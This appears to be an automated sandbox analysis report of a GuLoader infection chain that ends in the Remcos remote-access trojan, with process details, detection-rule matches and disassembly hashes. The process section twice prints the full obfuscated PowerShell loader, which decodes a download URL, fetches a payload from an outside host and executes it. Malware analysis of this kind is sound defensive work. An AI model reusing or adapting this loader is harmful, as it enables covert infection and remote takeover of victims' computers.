                                                  2024-12-17 07:30:17 UTC1369INData Raw: 55 d9 dd 5a c7 62 62 55 d5 23 df 4c 0a 88 36 d7 92 29 f9 f1 36 fa 96 0f 9a 76 df 91 86 94 fa 9a df 7a 75 6d 95 d8 a7 a9 96 42 41 d1 3b ac b2 08 05 d7 e0 74 c6 6d 7d 30 55 a7 80 af eb ae 14 50 c4 70 8b fe c8 f5 ec 34 a2 e8 1e c9 10 c1 cf 73 8d 29 38 7a ae 67 91 ed ab 5b bc c4 63 08 0c b6 13 0d e6 3e 0b 2a 4f ba 98 3c 3b f2 53 21 5b 35 ea 0a 47 48 bf 8b 76 d0 56 d3 79 41 d6 e3 66 51 34 33 8e 60 cb 89 54 1a 2b d9 79 1a 4e 64 89 bc 29 08 c6 b5 15 86 53 c5 b0 cd 4a c7 c6 64 55 43 77 4e c9 37 1e b6 4b 83 c9 dd 4c a0 b7 a9 fe 08 9d 9a 34 74 f5 74 64 2f 62 c3 87 8e 7a b7 0e 3b 02 c3 bb 25 2b f0 b6 7b f2 49 4a 57 48 53 59 1e 32 84 4f 8e d9 99 f3 88 11 5f b2 ab e8 2f ec d2 1b 7b 52 6c ae 99 ed 16 96 ec 12 85 d0 54 98 00 34 a5 3f c8 ee 4a 88 57 45 5c 6e 3f 70 c1 7c
                                                  Data Ascii: UZbbU#L6)6vzumBA;tm}0UPp4s)8zg[c>*O<;S![5GHvVyAfQ43`T+yNd)SJdUCwN7KL4ttd/bz;%+{IJWHSY2O_/{RlT4?JWE\n?p|


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:02:29:24
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs"
                                                  Imagebase:0x7ff6da7c0000
                                                  File size:170'496 bytes
                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:02:29:25
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn valdLdredButuaOmprtP kteRe orRegiifjten ResgStrosTweefJoseaS ilsQuesetoup] U b= de $ProtAPrv.dMa nkKontoShorm Gu.s L,gtFa thtolkaCemevIlteeUnder C.se Altn');$Noncorruptible=Astroite 'Demo$Sv.rDReraiSpejfA enf EkseFussr gnaeLexinMetatA teiHou aAfsk.Rea.DSpr oLejewInapnDa,blDi qoCowhaSentdDe,aFOptnitotalDefoe,ami(Exoc$Phr,AtheoaFestnGenndT hosGentaSpolrHjlpi rtesSkumttairoLinak athr EmoaW ittLtgbe defnMedhs Yoy,Prob$ RekWFor hHa voMutoo Ga,p,keleHumrrvanis ,yd)';$Whoopers=$Cissel;Forvanskende (Astroite 'R se$Ma igPus ltocho SlgB esa RokLSpl,:Avi e BerM GodA raklKla JStadR Po eCamaRIdylnAtmoeLeas=Indr(EnfetPer e BraSKolltUopd- Gh pForea U,lt PriH Res Cor,$Tot.w PenhIsocOInteodaispDi sEBigaRCholsDugd)');while (!$Emaljrerne) {Forvanskende (Astroite 'Cond$Aracg,edelProjo .ocbGiftaLaurlRigs: Tand HypeSubiuTe,rtP rkeCoatrRdesoB ffeFly lFyraa Va.ssprntNonpo C msA soeOldd=.loa$LystT.urneStabkSpndsFamitVealaUb snChonmDatarun ekSrsknEmb,icelen SkigSprgeIns.nAtoms') ;Forvanskende $Noncorruptible;Forvanskende (Astroite 'Tr.kSSunnTF ssaPar RBlotTSumm-F.gmsV olLPer,eBemaeIndiP Kam Indf4');Forvanskende (Astroite 'Pr,s$AarsGEftelAfshOKalob MulaBunklFo.k:carpEencoMDecyaC tolNonlJKandrBetaeVerdrRisin ExcEDamp=Para(DipatTr feWarrsInviTKlap- WeipUnspABr,lTDkfaH irs Omkl$Gr sW d ahPateOH fto ufPSepaEKde rForfSRick)') ;Forvanskende (Astroite 'Prof$Sol.g ExtLs dhOAra BSommABaluLPlad: nsF reco .slLareodJ.wsESamodPalmRGlooSHemm=Qua.$ oligradiLSkabOord bKaboARaptLPdag:CultePersA,emiSIndiTColuEElecdAnch+Unmi+Anoi% esu$Pantg nfiRSlutaC,tem nbeMAm.ho.ietfsquao Ch NmaniENy iRDis sGe n.AmniC SploHonoU BrenAntiT') ;$Aandsaristokratens=$Grammofoners[$Foldedrs]}$Drslagenes=312252;$Naturaliseringer=30375;Forvanskende (Astroite ' Cap$fo sgEfteLhyd oSh iBUdenA ColLOtte:TerrI remDUdbiEForhp De oBrndSOgleEN,nvrlame La t=Inte Paneg C ae Dists ld-Ro tCKonsoPodoNGynoTIndkELuthn SnetT ed Ind$ForsWbo rhT.inowineoAft p darEDr arB rgS');Forvanskende (Astroite 'Arc.$.olegBetalNa no ansbRecaaudsalNigr:F coG Blol CloaUnsusBeskpKalvuStadsSkrptT ykeNoddrOcelnBindeTi.m samm=Mis Ti b[La,oSErhvyMosts,midt OrieParcmAd p.KvadCExpeoUordn tomvRec eTrafrsty tSkud]mine:U,fo: SogFSel rLynioBoatmExtrBJaf aP itsV jkel xe6Hem 4LikeSChatt alarMedliLimbnActigM rl(Firm$HalviA.dedTrice ccp Seno apsssca eForbrGeop)');Forvanskende (Astroite 'Spat$nordGEvanlHowsoR asbPeroAUni l Gre: NotAKontd IndEfilbN.mpoo SveideceDGlu IFlu,stuneM gri Exe,= ttt Ga.e[EbliSKrityAdelS D.aT Y.geH rrM A l.CagptI dgEChemXUnclTSe i.InvoeMargn InvCTrkko SaxDMattISystnBordG on] Tea:Abol:Ung.aSsatS Il CAutoiPe,siLexi.SterGTa eERa eTSubcs gi TJokeRBathI nthNSkylGOper( np$QuaiG H sLBageadexisTrinPTrb,UAd,eSAs nt UndEGalaRFoliNadskE W n)');Forvanskende (Astroite 'Bill$SmedgTurnL FulosmutB Reia.etrLScro: YppiCakiNS euTNonteAlburfornIMermmglebsKunsBFortePoseV musiRec,SOrneE,overItalSBrig= Run$PinoaCorodStraERekon regoLni IIdy D G diSpuls HetM F r.MennsHjrnuRehybUnp sUnfoTE rir Musi StoNbeskGA ay(Barm$SptmDUforRE,teSSandlArbeaExeng M,lEBe knSkilELukkSIden,Iceb$ AnonInteAAfbeTItyluSub rStudaU palAfv.I RomSSejlEP,tarPosiItr pNCe tgEnt,EMagyRUnag)');Forvanskende $interimsbevisers;"
                                                  Imagebase:0x7ff760310000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:02:29:25
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff70f010000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:02:29:41
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn valdLdredButuaOmprtP kteRe orRegiifjten ResgStrosTweefJoseaS ilsQuesetoup] U b= de $ProtAPrv.dMa nkKontoShorm Gu.s L,gtFa thtolkaCemevIlteeUnder C.se Altn');$Noncorruptible=Astroite 'Demo$Sv.rDReraiSpejfA enf EkseFussr gnaeLexinMetatA teiHou aAfsk.Rea.DSpr oLejewInapnDa,blDi qoCowhaSentdDe,aFOptnitotalDefoe,ami(Exoc$Phr,AtheoaFestnGenndT hosGentaSpolrHjlpi rtesSkumttairoLinak athr EmoaW ittLtgbe defnMedhs Yoy,Prob$ RekWFor hHa voMutoo Ga,p,keleHumrrvanis ,yd)';$Whoopers=$Cissel;Forvanskende (Astroite 'R se$Ma igPus ltocho SlgB esa RokLSpl,:Avi e BerM GodA raklKla JStadR Po eCamaRIdylnAtmoeLeas=Indr(EnfetPer e BraSKolltUopd- Gh pForea U,lt PriH Res Cor,$Tot.w PenhIsocOInteodaispDi sEBigaRCholsDugd)');while (!$Emaljrerne) {Forvanskende (Astroite 'Cond$Aracg,edelProjo .ocbGiftaLaurlRigs: Tand HypeSubiuTe,rtP rkeCoatrRdesoB ffeFly lFyraa Va.ssprntNonpo C msA soeOldd=.loa$LystT.urneStabkSpndsFamitVealaUb snChonmDatarun ekSrsknEmb,icelen SkigSprgeIns.nAtoms') ;Forvanskende $Noncorruptible;Forvanskende (Astroite 'Tr.kSSunnTF ssaPar RBlotTSumm-F.gmsV olLPer,eBemaeIndiP Kam Indf4');Forvanskende (Astroite 'Pr,s$AarsGEftelAfshOKalob MulaBunklFo.k:carpEencoMDecyaC tolNonlJKandrBetaeVerdrRisin ExcEDamp=Para(DipatTr feWarrsInviTKlap- WeipUnspABr,lTDkfaH irs Omkl$Gr sW d ahPateOH fto ufPSepaEKde rForfSRick)') ;Forvanskende (Astroite 'Prof$Sol.g ExtLs dhOAra BSommABaluLPlad: nsF reco .slLareodJ.wsESamodPalmRGlooSHemm=Qua.$ oligradiLSkabOord bKaboARaptLPdag:CultePersA,emiSIndiTColuEElecdAnch+Unmi+Anoi% esu$Pantg nfiRSlutaC,tem nbeMAm.ho.ietfsquao Ch NmaniENy iRDis sGe n.AmniC SploHonoU BrenAntiT') ;$Aandsaristokratens=$Grammofoners[$Foldedrs]}$Drslagenes=312252;$Naturaliseringer=30375;Forvanskende (Astroite ' Cap$fo sgEfteLhyd oSh iBUdenA ColLOtte:TerrI remDUdbiEForhp De oBrndSOgleEN,nvrlame La t=Inte Paneg C ae Dists ld-Ro tCKonsoPodoNGynoTIndkELuthn SnetT ed Ind$ForsWbo rhT.inowineoAft p darEDr arB rgS');Forvanskende (Astroite 'Arc.$.olegBetalNa no ansbRecaaudsalNigr:F coG Blol CloaUnsusBeskpKalvuStadsSkrptT ykeNoddrOcelnBindeTi.m samm=Mis Ti b[La,oSErhvyMosts,midt OrieParcmAd p.KvadCExpeoUordn tomvRec eTrafrsty tSkud]mine:U,fo: SogFSel rLynioBoatmExtrBJaf aP itsV jkel xe6Hem 4LikeSChatt alarMedliLimbnActigM rl(Firm$HalviA.dedTrice ccp Seno apsssca eForbrGeop)');Forvanskende (Astroite 'Spat$nordGEvanlHowsoR asbPeroAUni l Gre: NotAKontd IndEfilbN.mpoo SveideceDGlu IFlu,stuneM gri Exe,= ttt Ga.e[EbliSKrityAdelS D.aT Y.geH rrM A l.CagptI dgEChemXUnclTSe i.InvoeMargn InvCTrkko SaxDMattISystnBordG on] Tea:Abol:Ung.aSsatS Il CAutoiPe,siLexi.SterGTa eERa eTSubcs gi TJokeRBathI nthNSkylGOper( np$QuaiG H sLBageadexisTrinPTrb,UAd,eSAs nt UndEGalaRFoliNadskE W n)');Forvanskende (Astroite 'Bill$SmedgTurnL FulosmutB Reia.etrLScro: YppiCakiNS euTNonteAlburfornIMermmglebsKunsBFortePoseV musiRec,SOrneE,overItalSBrig= Run$PinoaCorodStraERekon regoLni IIdy D G diSpuls HetM F r.MennsHjrnuRehybUnp sUnfoTE rir Musi StoNbeskGA ay(Barm$SptmDUforRE,teSSandlArbeaExeng M,lEBe knSkilELukkSIden,Iceb$ AnonInteAAfbeTItyluSub rStudaU palAfv.I RomSSejlEP,tarPosiItr pNCe tgEnt,EMagyRUnag)');Forvanskende $interimsbevisers;"
                                                  Imagebase:0x40000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1748100726.0000000008700000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1748291655.000000000994F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1728698519.0000000005995000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:02:29:41
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff70f010000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:02:30:02
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                  Imagebase:0xfc0000
                                                  File size:59'904 bytes
                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2649817843.0000000006C6F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2649989202.0000000006CAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  Disassembly

                                                  Reset < >

                                                    Executed Functions

                                                    Function 00007FF886D0AB26 Relevance: .5, Instructions: 472COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550018590.00007FF886D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886d00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f12f451b10806d195183d6334858e3a0637db2730c6ff9989dd7f7aae4a3fff3
                                                    • Instruction ID: 7c17cc7f24f4cf0f250e8cc9b7c4e98d7ffd0a55d50445dabc0adabd72793cf5
                                                    • Opcode Fuzzy Hash: f12f451b10806d195183d6334858e3a0637db2730c6ff9989dd7f7aae4a3fff3
                                                    • Instruction Fuzzy Hash: 68F19030918A8D8FEBA8DF28C8557E977D1FF54350F04427AE84EC7296DA799841CB82
                                                    Function 00007FF886D0B8D2 Relevance: .5, Instructions: 458COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550018590.00007FF886D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886d00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a742018fadfc0f1d8cfeb862c3b3e442355867539e21e1facc914cad8398a017
                                                    • Instruction ID: d68c5b05c274732659b36ceb636233b9eedf74a71427e006b18b3ee44a21cb7c
                                                    • Opcode Fuzzy Hash: a742018fadfc0f1d8cfeb862c3b3e442355867539e21e1facc914cad8398a017
                                                    • Instruction Fuzzy Hash: E9E1A13090CA4E8FEBA8DF28C8567E977D2FB54350F14427AD84EC7295DE799841CB82
                                                    Function 00007FF886DD5284 Relevance: 1.6, Strings: 1, Instructions: 339COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: A_H
                                                    • API String ID: 0-522415800
                                                    • Opcode ID: be9a651648beccae31fbdd0a5923e2c93c59b69bad2be33a59b5ea0dc1e39aed
                                                    • Instruction ID: 00be6cc042d629ed270be27a0290b45ea7c6ed73ec0091f01ffa417efd2899df
                                                    • Opcode Fuzzy Hash: be9a651648beccae31fbdd0a5923e2c93c59b69bad2be33a59b5ea0dc1e39aed
                                                    • Instruction Fuzzy Hash: CBB13621D0EACA4FE7A7AB6858552B57BE1FF5A390B4801FAC04EC71D3DD0AAC15C342
                                                    Function 00007FF886D0CD0D Relevance: 1.2, Instructions: 1209COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550018590.00007FF886D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886d00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f07b793b92236c8e7527fcdf8b1df073dd4238bb09884755703776f860086ea6
                                                    • Instruction ID: 42d965418919e49c2ea818ade350bd70ebffd6d1728aef75244aa0737cdf5ad4
                                                    • Opcode Fuzzy Hash: f07b793b92236c8e7527fcdf8b1df073dd4238bb09884755703776f860086ea6
                                                    • Instruction Fuzzy Hash: 2A42A130A18A498FDB98EF5CD495AE977E1FF98350F14017AD40AD7286CF35AC41CB82
                                                    Function 00007FF886DD97A4 Relevance: .4, Instructions: 407COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8def6900fbe1baebaf511a36c72c4500ae6c859b5f9f60dd0491ee8c06ef92e1
                                                    • Instruction ID: f2e27fbce396e1cfc97590e93f2cc1ac265fe0b4b3bf3b7b97c23b3240a1b8f4
                                                    • Opcode Fuzzy Hash: 8def6900fbe1baebaf511a36c72c4500ae6c859b5f9f60dd0491ee8c06ef92e1
                                                    • Instruction Fuzzy Hash: 77C1E722E0DA894FE796EA6858546757FE1FF56690B0901FAC04ECF1D3DE1BAC05C342
                                                    Function 00007FF886DD41C9 Relevance: .4, Instructions: 365COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 86f70fbe318194bceb212a8e2bb28465aa7120501dfdd3f530c7b707c055c372
                                                    • Instruction ID: 2f1238b3b69ef19cf5f67d44c64b679b753a4abeea635082479aa68135c3babd
                                                    • Opcode Fuzzy Hash: 86f70fbe318194bceb212a8e2bb28465aa7120501dfdd3f530c7b707c055c372
                                                    • Instruction Fuzzy Hash: 5DA11521E0DA8A4FE7E9AA6C58552B53BD1FF562A4F4801BED04FC31D3ED1AAC15C342
                                                    Function 00007FF886D0B4E6 Relevance: .3, Instructions: 331COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550018590.00007FF886D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886d00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dac8ee0351d2dd46b41127e12c279359e7e98ae1a5a2240d9d97f6f2499e5649
                                                    • Instruction ID: da331da0fd14b749a47d323e08e14c94b6e2790b3be30ef8dd9e9d0619c569a7
                                                    • Opcode Fuzzy Hash: dac8ee0351d2dd46b41127e12c279359e7e98ae1a5a2240d9d97f6f2499e5649
                                                    • Instruction Fuzzy Hash: 4AB1A23091CA8D8FEB68DF2898557E93BD1FF55350F04427EE84EC7292CA799845CB82
                                                    Function 00007FF886DDA1BA Relevance: .2, Instructions: 214COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24be52564693d6a883793751d84cc17e50e13051b38105c91c356ba4fb1aa4ef
